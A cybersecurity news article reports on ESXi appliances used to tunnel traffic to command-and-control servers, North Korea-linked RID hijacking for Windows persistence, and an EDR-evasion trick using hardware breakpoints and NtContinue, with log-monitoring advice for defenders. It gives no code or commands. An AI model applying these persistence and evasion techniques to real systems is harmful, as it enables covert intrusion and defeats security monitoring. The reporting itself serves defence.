Cybersecurity researchers have uncovered a new trend in ransomware attacks targeting ESXi systems. These attacks are now being used as a gateway to tunnel traffic to command-and-control (C2) infrastructure, allowing threat actors to operate stealthily within corporate networks. The researchers at Sygnia recently published a report highlighting this worrying development.
According to the researchers, threat actors are exploiting unmonitored ESXi appliances as a means of establishing persistence and gaining access to corporate networks. By using native tools like SSH to create a SOCKS tunnel between their C2 servers and the compromised environment, the attackers are able to blend in with legitimate network traffic, making it difficult for security controls to detect their activities.
In many incident response engagements, Sygnia found that ESXi systems were compromised either through the use of stolen admin credentials or by exploiting known security vulnerabilities. Once access is gained, threat actors set up tunnels using SSH or similar tools to create a semi-persistent backdoor within the network, ensuring long-term access without raising suspicion.
Monitoring ESXi logs is crucial in detecting and responding to these attacks. Sygnia recommends configuring log forwarding to capture relevant events in one centralized location for forensic analysis. Specifically, organizations should review log files such as /var/log/shell.log, /var/log/hostd.log, /var/log/auth.log, and /var/log/vobd.log to identify suspicious activities related to SSH tunneling on ESXi appliances.
In a separate development, the Andariel group, linked to North Korea, has been observed using a technique known as Relative Identifier (RID) hijacking to achieve persistence in Windows environments. This method involves covertly modifying the Windows Registry to assign guest or low-privileged accounts administrative permissions during the next login. By exploiting this vulnerability, threat actors can perform malicious actions without detection, leveraging the lack of surveillance on regular user accounts.
To execute RID hijacking successfully, adversaries must have already compromised a machine and gained administrative or SYSTEM privileges. This enables them to change the RID value of a standard account to that of the Administrator account, granting elevated privileges without triggering alerts.
Meanwhile, researchers have identified a new technique for evading Endpoint Detection and Response (EDR) systems by leveraging hardware breakpoints. By using the NtContinue function instead of SetThreadContext, attackers can avoid triggering Event Tracing for Windows (ETW) detections, effectively bypassing EDR telemetry that relies on SetThreadContext for monitoring suspicious activities. This approach enables threat actors to manipulate telemetry in userland without direct kernel patching, posing a challenge to traditional defense mechanisms.
Overall, these developments underscore the evolving tactics of cybercriminals and the need for organizations to enhance their cybersecurity measures to effectively detect and respond to advanced threats. By staying vigilant and adopting proactive security measures, businesses can mitigate the risks posed by ransomware, RID hijacking, and EDR evasion techniques.